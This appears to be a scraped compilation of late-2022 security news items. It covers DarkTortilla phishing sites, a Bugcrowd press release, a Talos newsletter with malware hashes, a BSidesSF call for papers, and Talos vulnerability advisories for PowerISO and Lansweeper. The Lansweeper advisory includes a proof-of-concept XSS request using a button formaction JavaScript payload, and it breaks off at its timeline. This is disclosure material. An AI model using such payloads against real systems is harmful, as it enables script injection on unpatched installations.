Sites spoofing Grammarly and a Cisco webpage are spreading the DarkTortilla threat, which is filled with follow-on malware attacks.

Researchers have spotted two phishing sites — one spoofing a Cisco webpage and the other masquerading as a Grammarly site — that threat actors are using to distribute a particularly pernicious piece of malware known as "DarkTortilla."

The .NET-based malware can be configured to deliver various payloads and is known for functions that make it extremely stealthy and persistent on the systems it compromises.

Multiple threat groups have been using DarkTortilla since at least 2015 to drop information stealers and remote access Trojans, such as AgentTesla, AsyncRAT and NanoCore. Some ransomware groups too — such as the operators of Babuk — have used DarkTortilla as part of their payload delivery chain. In many of these campaigns, attackers have primarily used malicious file attachments (.zip, .img, .iso) in spam emails to wrap up unsuspecting users in the malware.

**DarkTortilla Delivery Via Phishing Sites**

Recently, researchers at Cyble Research and Intelligence Labs identified a malicious campaign where threat actors are using two phishing sites, masquerading as legitimate sites, to distribute the malware. Cyble surmised that the operators of the campaign are likely using spam email or online ads to distribute links to the two sites.

Users who follow the link to the spoofed Grammarly website end up downloading a malicious file named "GnammanlyInstaller.zip" when they click on the "Get Grammarly" button. The .zip file contains a malicious installer disguised as a Grammarly executable that drops a second, encrypted 32-bit .NET executable. That in turn downloads an encrypted DLL file from an attacker-controlled remote server. The .NET executable decrypts the encrypted DLL file and loads it into the compromised system's memory, where it executes a variety of malicious activities, Cyble said.

The Cisco phishing site meanwhile looks like a download page for Cisco's Secure Client VPN technology. But when a user clicks on the button to "order" the product, they end up downloading a malicious VC++ file from a remote attacker-controlled server instead. The malware triggers a series of actions that end with DarkTortilla installed on the compromised system.

Cyble's analysis of the payload showed the malware packing functions for persistence, process injection, doing antivirus and virtual machine/sandbox checks, displaying fake messages, and communicating with its command-and-control (C2) server and downloading additional payloads from it.

Cyble's researchers found that to ensure persistence on an infected system for instance, DarkTortilla drops a copy of itself into the system's Startup folder and creates Run/Winlogin registry entries. As an additional persistence mechanism, DarkTortilla also creates a new folder named "system\_update.exe" on the infected system and copies itself into the folder.

**Sophisticated & Dangerous Malware**

DarkTortilla's fake message functionality meanwhile basically serves up messages to trick victims into believing the Grammarly or Cisco application they wanted failed to execute because certain dependent application components were not available on their system.

"The DarkTortilla malware is highly sophisticated .NET-based malware that targets users in the wild," Cyble researchers said in a Monday advisory. "The files downloaded from the phishing sites exhibit different infection techniques, indicating that the \[threat actors\] have a sophisticated platform capable of customizing and compiling the binary using various options."

DarkTortilla, as mentioned, often acts as a first-stage loader for additional malware. Researchers from Secureworks' Counter Threat Unit earlier this year identified threat actors using DarkTortilla to mass distribute a wide range of malware including, Remcos, BitRat, WarzoneRat, Snake Keylogger, LokiBot, QuasarRat, NetWire, and DCRat.

They also identified some adversaries using the malware in targeted attacks to deliver Cobalt Strike and Metasploit post-compromise attack kits. At the time, Secureworks said it had counted at least 10,000 unique DarkTortilla samples since it first spotted a threat actor using the malware in an attack targeting a critical Microsoft Exchange remote code execution vulnerability (CVE-2021-34473) last year.

Secureworks assessed DarkTortilla as being very dangerous because of its high degree of configurability and its use of open source tools like CofuserEX and DeepSea to obfuscate its code. The fact that DarkTortilla's main payload is executed entirely in memory is another feature that makes the malware dangerous and difficult to spot, Secureworks noted at the time.

Sophisticated DarkTortilla Malware Serves Imposter Cisco, Grammarly Pages

Leading global education provider engages with Bugcrowd Security Researchers to identify threats.

**SYDNEY** **and** **SAN FRANCISCO****,** **Dec. 19, 2022** **/PRNewswire/ --** Bugcrowd, the leader in crowdsourced cybersecurity, today announced that Navitas, one of the world's leading global education providers, has launched a private bug bounty program with Bugcrowd to identify and resolve security vulnerabilities.

Navitas delivers educational programs to 60,000 aspirational students each year across its network of 92 colleges and campuses in 24 countries around the world. Under the bug bounty program, dozens of Bugcrowd security researchers will test Navitas' web applications for security risks on an ongoing basis. Ethical hackers who identify and remediate any valid threats will receive a bug bounty financial reward of up to AUD $3,700 (USD $2,500), depending on the severity of the uncovered threat.

Gavin Ryan, Global Head of Information Security for Navitas, selected the Bugcrowd crowdsourced security solution based on its proven track record of being able to scale, reduce costs and risks through a continuous testing process, along with the extensive global reach of its researcher team. 

"At Navitas we take the security of our data and applications extremely seriously and are always seeking innovative ways to protect the private information of our students and staff from continuous and fast-changing cyber threats," said Gavin Ryan. "We are pleased to partner with Bugcrowd to take advantage of its extensive network of trained security researchers who can help us find and resolve online vulnerabilities before attacks occur. Only a month into the program, we are already realising the benefits of a bug bounty program and plan to extended it to include agile continuous security testing across selected non production environments" 

Bugcrowd's ability to deliver a fast return on investment through crowdsourced bug bounties, rather than undertaking lengthy and costly consulting engagements, was one of the biggest contributing factors in its selection. The solution's continuous assurance model was also better positioned to safeguard Navitas' global attack surface, which had made traditional penetration testing less tenable and less effective for ongoing application security assurance.

"Bugcrowd is excited to work with Navitas in assisting to protect both their data and applications with a comprehensive bug bounty strategy and a non production testing strategy," said Nick McKenzie, Chief Information and Security Officer at Bugcrowd. "Our extensive global crowdsourced security team has the ability to scale for Navitas's requirements, provide critical protections around the clock, and through the introduction of non-production testing regimes will help the Navitas business deliver at a higher digital velocity. We are happy that both control outcomes and the economics of the program's delivery (vs other testing regimes) have exceeded expectations."

"Bugcrowd" and the "Bugcrowd Security Knowledge Platform" are trademarks of Bugcrowd Inc. and its subsidiaries. All other trademarks, trade names, service marks and logos referenced herein belong to their respective companies.

**About Bugcrowd**

Bugcrowd is the leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world. Today's enterprise demands an offensive approach to cybersecurity—and Bugcrowd offers the only solution that orchestrates data, technology, and human intelligence to expose blind spots. The Bugcrowd Security Knowledge Platform™ enables businesses to do everything proactively possible to protect their organization, reputation and customers with products like Bug Bounty, Penetration Testing-as-a-Service, and more. Trusted by organizations across the globe, Bugcrowd uncovers and remediates vulnerabilities before they interrupt business by leveraging expert ingenuity and the knowledge of world-class security researchers. Based in San Francisco, Bugcrowd is backed by Blackbird Ventures, Costanoa Ventures, Industry Ventures, Paladin Capital Group, Rally Ventures, Salesforce Ventures and Triangle Peak Partners. Learn more at www.bugcrowd.com.

SOURCE Bugcrowd

Bugcrowd Launches Bug Bounty Program for Australian-Based Navitas

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**SUMMARY**

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

PowerISO PowerISO 8.3

**PRODUCT URLS**

PowerISO - https://www.poweriso.com/

**CVSSv3 SCORE**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-787 - Out-of-bounds Write

**DETAILS**

PowerISO is a disk image file processing tool supporting operations on various file formats, and also allows to mount images as a virtual drive.

Virtual Hard Disk (VHD) Image format is a commonly image format used in Microsoft virtualization products. It is both used to store hard disk images and snapshots.  
For more details about this format see link.

Vulnerable code below:

        0000000000442869 | 41:8B0C38                | mov ecx,dword ptr ds:[r8+rdi]
        000000000044286D | 41:FFC1                  | inc r9d
        0000000000442870 | 8BC1                     | mov eax,ecx
        0000000000442872 | 8BD1                     | mov edx,ecx
        0000000000442874 | C1E9 08                  | shr ecx,8
        0000000000442877 | C1E2 10                  | shl edx,10
        000000000044287A | 41:23C5                  | and eax,r13d
        000000000044287D | 41:23CD                  | and ecx,r13d
        0000000000442880 | 0BD0                     | or edx,eax
        0000000000442882 | 41:0FB64438 03           | movzx eax,byte ptr ds:[r8+rdi+3]
        0000000000442888 | C1E2 08                  | shl edx,8
        000000000044288B | 0BD0                     | or edx,eax
        000000000044288D | 48:8B43 10               | mov rax,qword ptr ds:[rbx+10]
        0000000000442891 | 0BD1                     | or edx,ecx
        0000000000442893 | 41:891400                | mov dword ptr ds:[r8+rax],edx
        0000000000442897 | 49:83C0 04               | add r8,4
        000000000044289B | 44:3B4B 18               | cmp r9d,dword ptr ds:[rbx+18]       ; * Num of blocks from cxsparse record
        000000000044289F | 72 C8                    | jb poweriso.442869
    

Vulnerability exists because the “Num of blocks” value from the CXSPARSE record is not validated properly.  
An attacker can control the loop counter leading to arbitrary memory write.

**Crash Information**

    	PowerISO+0x42893:
    	00000000`00442893 41891400        mov     dword ptr [r8+rax],edx ds:00000000`02b2f000=????????
    
    
    	0:000> !analyze -v
    	*******************************************************************************
    	*                                                                             *
    	*                        Exception Analysis                                   *
    	*                                                                             *
    	*******************************************************************************
    
    
    	KEY_VALUES_STRING: 1
    
    		Key  : AV.Fault
    		Value: Write
    
    		Key  : Analysis.CPU.mSec
    		Value: 1281
    
    		Key  : Analysis.DebugAnalysisManager
    		Value: Create
    
    		Key  : Analysis.Elapsed.mSec
    		Value: 17362
    
    		Key  : Analysis.IO.Other.Mb
    		Value: 9
    
    		Key  : Analysis.IO.Read.Mb
    		Value: 1
    
    		Key  : Analysis.IO.Write.Mb
    		Value: 12
    
    		Key  : Analysis.Init.CPU.mSec
    		Value: 406
    
    		Key  : Analysis.Init.Elapsed.mSec
    		Value: 9616
    
    		Key  : Analysis.Memory.CommitPeak.Mb
    		Value: 106
    
    		Key  : Timeline.OS.Boot.DeltaSec
    		Value: 471002
    
    		Key  : Timeline.Process.Start.DeltaSec
    		Value: 12
    
    		Key  : WER.OS.Branch
    		Value: vb_release
    
    		Key  : WER.OS.Timestamp
    		Value: 2019-12-06T14:06:00Z
    
    		Key  : WER.OS.Version
    		Value: 10.0.19041.1
    
    		Key  : WER.Process.Version
    		Value: 8.3.0.0
    
    
    	NTGLOBALFLAG:  0
    
    	PROCESS_BAM_CURRENT_THROTTLED: 0
    
    	PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    	APPLICATION_VERIFIER_FLAGS:  0
    
    	EXCEPTION_RECORD:  (.exr -1)
    	ExceptionAddress: 0000000000442893 (PowerISO+0x0000000000042893)
    	   ExceptionCode: c0000005 (Access violation)
    	  ExceptionFlags: 00000000
    	NumberParameters: 2
    	   Parameter[0]: 0000000000000001
    	   Parameter[1]: 0000000002c5f000
    	Attempt to write to address 0000000002c5f000
    
    	FAULTING_THREAD:  00000ba0
    
    	PROCESS_NAME:  PowerISO.exe
    
    	WRITE_ADDRESS:  0000000002c5f000 
    
    	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    	EXCEPTION_CODE_STR:  c0000005
    
    	EXCEPTION_PARAMETER1:  0000000000000001
    
    	EXCEPTION_PARAMETER2:  0000000002c5f000
    
    	STACK_TEXT:  
    	00000000`0014de30 00000000`00442aad     : 00000000`00000200 00000000`00000000 00000000`000007b3 00000000`3000cbfb : PowerISO+0x42893
    	00000000`0014e2b0 00000000`00442d2c     : 00000000`05a603c0 00000000`00000000 78697463`656e6f63 00000000`00000001 : PowerISO+0x42aad
    	00000000`0014e520 00000000`004061ae     : 00000000`00000001 00000000`00000688 00000000`03380f70 00000000`03380f70 : PowerISO+0x42d2c
    	00000000`0014e560 00000000`005d6cf6     : 00000000`0014e7a8 00000000`0014e7a8 00000000`00000001 00000000`02ba853c : PowerISO+0x61ae
    	00000000`0014e710 00000000`004f2733     : 00000000`0014e8b0 00000000`00000000 00000000`00000000 00007ff9`4a6dc9bb : PowerISO+0x1d6cf6
    	00000000`0014e830 00000000`004f2fc5     : 00000000`1c12beb3 00000000`0014ebc8 00000000`66076fb2 00000000`d88dfeb5 : PowerISO+0xf2733
    	00000000`0014eb90 00000000`005561ef     : 00000000`00000004 00000000`0333ba1c 00000000`00000000 00000000`03348f60 : PowerISO+0xf2fc5
    	00000000`0014ebc0 00000000`004ee5ad     : 00000000`0014ed00 00007ff9`35ff414e 00000000`00000004 00008731`00000002 : PowerISO+0x1561ef
    	00000000`0014ebf0 00000000`006280ed     : 00000000`00000001 00007ff9`4a6deb96 00000000`00000363 00000000`00000001 : PowerISO+0xee5ad
    	00000000`0014f890 00000000`00624c83     : 00000000`02b50150 ffffffff`ffffffff 00000000`00000006 00000000`00000080 : PowerISO+0x2280ed
    	00000000`0014f9c0 00000000`004ebf6f     : 00000000`00000000 00000000`00d3103e 00000000`03348f60 00000000`00000001 : PowerISO+0x224c83
    	00000000`0014fa20 00000000`00626410     : ffffffff`fffffffe 00000000`00000113 00000000`00000000 00000000`00000113 : PowerISO+0xebf6f
    	00000000`0014fa50 00000000`006265be     : 00000000`008df500 00000000`00becb30 00000000`0333c920 00007ff9`02000002 : PowerISO+0x226410
    	00000000`0014fb10 00007ff9`4a6de858     : 00000000`008df4a0 00000000`00000113 00000000`00000001 00000000`00000000 : PowerISO+0x2265be
    	00000000`0014fb70 00007ff9`4a6de299     : 00000000`00d3103e 00000000`00626570 00000000`00d3103e 00000000`00000113 : USER32!UserCallWinProcCheckWow+0x2f8
    	00000000`0014fd00 00000000`00621c6d     : 00000000`00626570 00000000`008df4a0 00000000`00000002 00000000`008df4a0 : USER32!DispatchMessageWorker+0x249
    	00000000`0014fd80 00000000`00621aa9     : 00000000`008df4a0 00000000`00400000 00000000`00000001 00000000`00000000 : PowerISO+0x221c6d
    	00000000`0014fdc0 00000000`0062aa57     : 00000000`006486d8 00000000`00000000 00000000`00648718 00000000`00648720 : PowerISO+0x221aa9
    	00000000`0014fe20 00000000`005f607b     : 00000000`00000045 00000000`00000000 00000000`00000000 00000000`00400000 : PowerISO+0x22aa57
    	00000000`0014fe80 00007ff9`4a627034     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : PowerISO+0x1f607b
    	00000000`0014ff30 00007ff9`4a9426a1     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
    	00000000`0014ff60 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
    
    
    	STACK_COMMAND:  ~0s ; .cxr ; kb
    
    	SYMBOL_NAME:  PowerISO+42893
    
    	MODULE_NAME: PowerISO
    
    	IMAGE_NAME:  PowerISO.exe
    
    	FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_PowerISO.exe!Unknown
    
    	OS_VERSION:  10.0.19041.1
    
    	BUILDLAB_STR:  vb_release
    
    	OSPLATFORM_TYPE:  x64
    
    	OSNAME:  Windows 10
    
    	IMAGE_VERSION:  8.3.0.0
    
    	FAILURE_ID_HASH:  {1b12d601-7fad-79d8-d5a8-9f7caedc20c8}
    
    	Followup:     MachineOwner
    	---------
    

**TIMELINE**

2022-10-27 - Vendor Disclosure  
2022-11-28 - Vendor Patch Release  
2022-12-07 - Public Release

Discovered by Piotr Bania of Cisco Talos.

CVE-2022-41992: TALOS-2022-1644 || Cisco Talos Intelligence Group

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022.

Friday, December 16, 2022 09:12

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022. Our activities in Ukraine have been well documented, in this episode we'll also talk more broadly about the trends and highlight some key findings from the past year.

This and all other episdoes are available on the Talos Takes podcast page and most major podcasting outlets.

Visit the Year in Review page for the full report, with topic summary reports, livestreams, podcasts, and other content starting December 14th.  New content will be added with each topic summary release through February.  You can access the full 2022 Cisco Talos Year in Review report directly here:

Talos Takes Ep. 122: Year in Review & Ukraine Activities

The inaugural 2022 Talos Year in Review is here! And it’s taking over the final Threat Source newsletter of the year.

Thursday, December 15, 2022 14:12

Welcome to this week’s edition of the Threat Source newsletter.

It’s the most wonderful time of the year, and I’m not talking about the holidays. The inaugural 2022 Talos Year in Review is here! And it’s taking over the final Threat Source newsletter of the year. Oh and did we mention we’re on Mastodon now? Talos, the gift that keeps on giving.

**The one big thing**

The 2022 Talos Year in Review is officially launched and with it a compressive story of our work in the past year relying on a wide variety of data and expertise. We expect this data-driven story will shed some insight into Cisco’s and the security community’s most notable successes and remaining challenges. In addition, as these Year in Review reports continue in the future, we aim to provide data and narratives that help explain how the threat landscape changes from one year to the next. We hope you find this report as elucidating to read as it was to research and write, and that it arms the security community with the information and context needed to continue fighting the good fight.

**Why do I care?**

Talos’ Year in Review takes a broad look not only at the major security events but looks at the major impacts and trends within the larger threat landscapes and takes a deep dive in to the top threats. We’ll be hosting livestreams on four sub-sections of the report with researchers and report contributors to cover the full research and findings.

**So now what?**

Pour yourself a glass of your favorite beverage, start up the fire and get to reading! Mark your calendar for our next three livestreams in the new year:

2022 Year in Review-APTs: Jan 10th, 12pm ET

2022 Year in Review- Threat Landscape: Jan 24th, 12pm ET

2022 Year in Review- Ransomware & Commodity Loaders: February 7th, 12pm ET

**Top security headlines of the week**

If you’ve yet to stumble upon ChatGPT or hear about it at the office water cooler you may be living under a rock (we’ve been there too). The AI chat bot developed by OpenAI and released last week, creates human like responses to user-generated prompts. While it has the ability to take on mundane tasks the evolution of AI still raises eyebrows in security communities with concerns of deep fakes and fake news campaigns. (CNET)

The U.S. Department of Justice announced this week the take down of leading global distributed denial-of-service sites for-hire websites. The takedowns were part of a joint operation, “Operation PowerOFF”, between the US, the U.K.’s National Crime Agency, Dutch police, and Europol. The sites were involved in attacks against varied victims in the U.S. and abroad, spanning educational institutions, government agencies, and gaming platforms. (TechCrunch)

The US Cybersecurity and Infrastructure Security Agency (CISA) added new flaws to its Known Exploited Vulnerabilities Catalog including Veeam, Fortinet, Microsoft and Citrix products. Vulnerabilities, CVE-2022-26500 and CVE-2022-26501, are rated ‘critical’ and impact Veeam’s Backup & Replication enterprise backup solutions. Used by 70% of Fortune 2000 companies, Veeam products continue to be tempting targets for malicious actors. (SecurityWeek)

**Can’t get enough Talos?**

·Talos 2022 Year in Review

·Beers with Talos

·Microsoft Patch Tuesday for December 2022

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)

Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)

Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256: 1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d

MD5: 26f927fb7560c11e509f0b8a7e787f79  
26f927fb7560c11e509f0b8a7e787f79

Typical Filename: VID001.exe

Detection Name: W32.File.MalParent

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

Typical Filename: VID001.exe

Detection Name: Simple\_Custom\_Detection

SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c

MD5: a087b2e6ec57b08c0d0750c60f96a74c

Typical Filename: AAct.exe

Detection Name: W32.File.MalParent

SHA 256: 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645

MD5:  
2c8ea737a232fd03ab80db672d50a17a

Typical Filename: LwssPlayer.scr

Detection Name: Auto.125E12.241442.in02

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

Typical Filename: IMG001.exe

Detection Name: Trojan.GenericKD.33515991

Threat Source newsletter (Dec. 15, 2022): Talos Year in Review is here

BSidesSF is soliciting presentations, workshops, and villages for the 2023 annual BSidesSF conference. It will be located at City View at the Metreon in downtown San Francisco April 22nd through the 23rd, 2023.

    BSidesSF is soliciting presentations, workshops, and villages for the 2023annual BSidesSF conference.Presentations: https://bsidessf.org/cfpWorkshops: https://bsidessf.org/cfp/workshopsVillages: https://bsidessf.org/cfp/villages** Topics **All topic areas related to reliability, application security, web security,network security, privacy, cryptography, and information security are ofinterest and in scope.Let us help you get the word out on The Next Big Thing!** Theme **Space: Putting the Cyber in Space!, to commemorate the new James Webb SpaceTelescope while paying homage to "cyberspace".** Submission **Presentations: https://bsidessf.org/cfpWorkshops: https://bsidessf.org/cfp/workshopsVillages: https://bsidessf.org/cfp/villages** Dates and Deadlines **January 8, 2023 – Final due date for all submissions, rolling notificationsbeginJanuary 22, 2023 – All notifications, including waitlist, sentFebruary 7, 2023 – Participation confirmed by presenters and detailsfinalizedApril 22-23, 2023 - BSidesSF 2023** Location **BSidesSF will be located at City View at the Metreon in downtown SanFrancisco.******Thanks!Security BSides San Franciscohttps://bsidessf.orgprogram@bsidessf.orghttps://twitter.com/BSidesSF

BSides SF 2023 Call For Papers

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-184 - Incomplete Blacklist

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

Lansweeper developers allow users to use certain html tags together with chosen attributes in content added/created by users, e.g. News, Ticket text, etc. To avoid malicious XSS attacks, data which might contain such code is sanitized before being added to the page content. We can see such a sanitization example in the widget responsible for News presentation:

    Line 1 	\App_Web_2mmqsorv\ASP\widgets_helpdesknews_aspx.cs
    Line 2 			
    Line 3 			Dictionary<int, News> dictionary = (from row in NewsController.GetClonedCachedNews().AsEnumerable()
    Line 4 				where row.value.Enabled
    Line 5 				select row).ToDictionary((KeyValuePair<int, News> row) => row.Key, (KeyValuePair<int, News> row) => row.Value);
    Line 6 			if (dictionary.Values.Count > 0)
    Line 7 			{
    Line 8 				__w.Write("\r\n        <div id=\"news\" style=\"overflow: auto; line-height: normal;\">\r\n            <div>\r\n                <table>\r\n                    <tbody>\r\n                        ");
    Line 9 				foreach (News objNews in dictionary.objNewss)
    Line 10				{
    Line 11					__w.Write("\r\n                                <tr>\r\n                                    <td valign=\"top\">\r\n                                        ");
    Line 12					if (objNews.Type != 5)
    Line 13					{
    Line 14						__w.Write("\r\n                                            <img alt=\"\" src=\"");
    Line 15						__w.Write(General.PathPrefix());
    Line 16						__w.Write("images/p");
    Line 17						__w.Write(HttpUtility.HtmlEncode(objNews.Type));
    Line 18						__w.Write(".png\"/>\r\n                                        ");
    Line 19					}
    Line 20					__w.Write("\r\n                                    </td>\r\n                                    <td width=\"100%\">");
    Line 21					__w.Write(HtmlSanitizer.SanitizeHtml(objNews.GetTextTranslation(LS.User.Current().Lang)));
    Line 22					__w.Write("</td>\r\n                                </tr>\r\n                        ");
    Line 23				}
    Line 24				__w.Write("\r\n                    </tbody>\r\n                </table>\r\n            </div>\r\n        </div>  \r\n    ");
    Line 25			}
    

as we can see in line 21 before news text is written to the page content, it’s being sanitized by HtmlSanitizer.SanitizeHtml method. Let us take a look at HtmlSanitizer class implementation:

    Line 1 	LS\Extensions\HtmlSanitizer\HtmlSanitizer.cs
    Line 2 	(...)
    Line 3 			public static HtmlSanitizer CustomHtmlSanitizer()
    Line 4 			{
    Line 5 				HtmlSanitizer htmlSanitizer = new HtmlSanitizer();
    Line 6 				string text = "width height style align valign";
    Line 7 				string[] array = new string[58]
    Line 8 				{
    Line 9 					"h1", "h2", "h3", "h3", "h4", "h5", "h6", "strong", "b", "i",
    Line 10					"em", "thead", "tbody", "tr", "br", "p", "div", "span", "ul", "u",
    Line 11					"pre", "sub", "sup", "strike", "hr", "center", "dl", "dt", "dd", "abbr",
    Line 12					"address", "article", "aside", "bdi", "canvas", "caption", "cite", "code", "col", "colgroup",
    Line 13					"datalist", "dfn", "figcaption", "footer", "header", "kbd", "mark", "nav", "noscript", "picture",
    Line 14					"summary", "s", "samp", "section", "small", "tfoot", "var", "wbr"
    Line 15				};
    Line 16				foreach (string tagName in array)
    Line 17				{
    Line 18					htmlSanitizer.Tag(tagName).AllowAttributes(text);
    Line 19				}
    Line 20				htmlSanitizer.Tag("img").AllowAttributes(text + " src title alt crossorigin ismap longdesc usemap");
    Line 21				htmlSanitizer.Tag("table").AllowAttributes(text + " border cellpadding cellspacing rules sortable summary");
    Line 22				htmlSanitizer.Tag("td").AllowAttributes(text + " colspan rowspan headers");
    Line 23				htmlSanitizer.Tag("ol").AllowAttributes(text + " start reversed type");
    Line 24				htmlSanitizer.Tag("font").AllowAttributes(text + " color face size");
    Line 25				htmlSanitizer.Tag("a").AllowAttributes(text + " href dowload hreflang media media_query rel target type").RemoveEmpty();
    Line 26				htmlSanitizer.Tag("video").AllowAttributes(text + " controls autoplay loop muted poster preload src");
    Line 27				htmlSanitizer.Tag("source").AllowAttributes(text + " src type media");
    Line 28				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 29				htmlSanitizer.Tag("area").AllowAttributes(text + " alt coords download href hreflang media rel shape target type");
    Line 30				htmlSanitizer.Tag("audio").AllowAttributes(text + " autoplay controls loop muted preload src");
    Line 31				htmlSanitizer.Tag("bdo").AllowAttributes(text + " dir");
    Line 32				htmlSanitizer.Tag("blockquote").AllowAttributes(text + " cite");
    Line 33				htmlSanitizer.Tag("button").AllowAttributes(text + " autofocus disabled form formaction formenctype formmethod formnovalidate formtarget name type value");
    Line 34				htmlSanitizer.Tag("del").AllowAttributes(text + " cite datetime");
    Line 35				htmlSanitizer.Tag("ins").AllowAttributes(text + " cite datetime");
    Line 36				htmlSanitizer.Tag("details").AllowAttributes(text + " open");
    Line 37				htmlSanitizer.Tag("dialog").AllowAttributes(text + " open");
    Line 38				htmlSanitizer.Tag("label").AllowAttributes(text + " for");
    Line 39				htmlSanitizer.Tag("li").AllowAttributes(text + " value");
    Line 40				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 41				htmlSanitizer.Tag("menu").AllowAttributes(text + " label type");
    Line 42				htmlSanitizer.Tag("menuitem").AllowAttributes(text + " checked command default disabled icon label type");
    Line 43				htmlSanitizer.Tag("q").AllowAttributes(text + " cite");
    Line 44				htmlSanitizer.Tag("th").AllowAttributes(text + " abbr colspan headers rowspan scope sorted");
    Line 45				htmlSanitizer.Tag("time").AllowAttributes(text + " datetime");
    Line 46				htmlSanitizer.Tag("track").AllowAttributes(text + " default kind label src srclang");
    Line 47				htmlSanitizer.RemoveComments = true;
    Line 48				htmlSanitizer.ForbiddenElements.Add("script");
    Line 49				htmlSanitizer.ForbiddenElements.Add("style");
    Line 50				htmlSanitizer.TransformLinks = true;
    Line 51				return htmlSanitizer;
    Line 52			}
    Line 53
    Line 54			public static string SanitizeHtml(string html, params string[] WhiteList)
    Line 55			{
    Line 56				string text = "";
    Line 57				try
    Line 58				{
    Line 59					text = new SimpleHtmlParser().ParseString(html).OuterXml;
    Line 60				}
    Line 61				catch (Exception ex)
    Line 62				{
    Line 63					ErrorLogging.LogToFile(ex, "Parser error");
    Line 64					text = html;
    Line 65				}
    Line 66				text = CustomHtmlSanitizer().Sanitize(text);
    Line 67				HtmlDocument htmlDocument = new HtmlDocument();
    Line 68				htmlDocument.LoadHtml(text);
    Line 69				SanitizeCss(htmlDocument.DocumentNode);
    Line 70				if (htmlDocument.DocumentNode.ChildNodes.Count == 0 || htmlDocument.DocumentNode.ChildNodes.Count > 1)
    Line 71				{
    Line 72					return "<div style=\"font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;\">" + htmlDocument.DocumentNode.InnerHtml.Trim() + "</div>";
    Line 73				}
    Line 74				return htmlDocument.DocumentNode.InnerHtml.Trim();
    Line 75			}
    Line 76	(...)
    

That’s of course just a part of this class, but we can observe more or less what the assumptions are, etc. This class contains a list of allowed html tags and their attributes the user might use in the text. There are also additional checks for particular attributes (for example, for href where developers check whether it does not start with a schema different than “http/https”). Unfortunately developers allow a tag like button with its attribute formaction and do not sanitize it at all. This gives a potential attacker the possibility to inject malicious javascript code, which will be triggered after the user clicks the button.

**Exploit Proof of Concept**

REQUEST POST /configuration/MainPage/MainPageActions.aspx?action=editnews&id=3 HTTP/1.1 Host: 192.168.0.102:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: _/_ Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 438 Origin: http://192.168.0.102:81 Connection: close Referer: http://192.168.0.102:81/configuration/MainPage/ Cookie: UserSettings=language=1; ASP.NET\_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=;

    __VIEWSTATE=&editnewstext=<button style="width: 500px;height:500px" form="formc" formaction="javascript:alert(1)">click me</button>&newsid=3
    

RESPONSE HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/8.0 x-frame-options: SAMEORIGIN X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 09 Jun 2022 10:15:53 GMT Connection: close Content-Length: 150

    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**
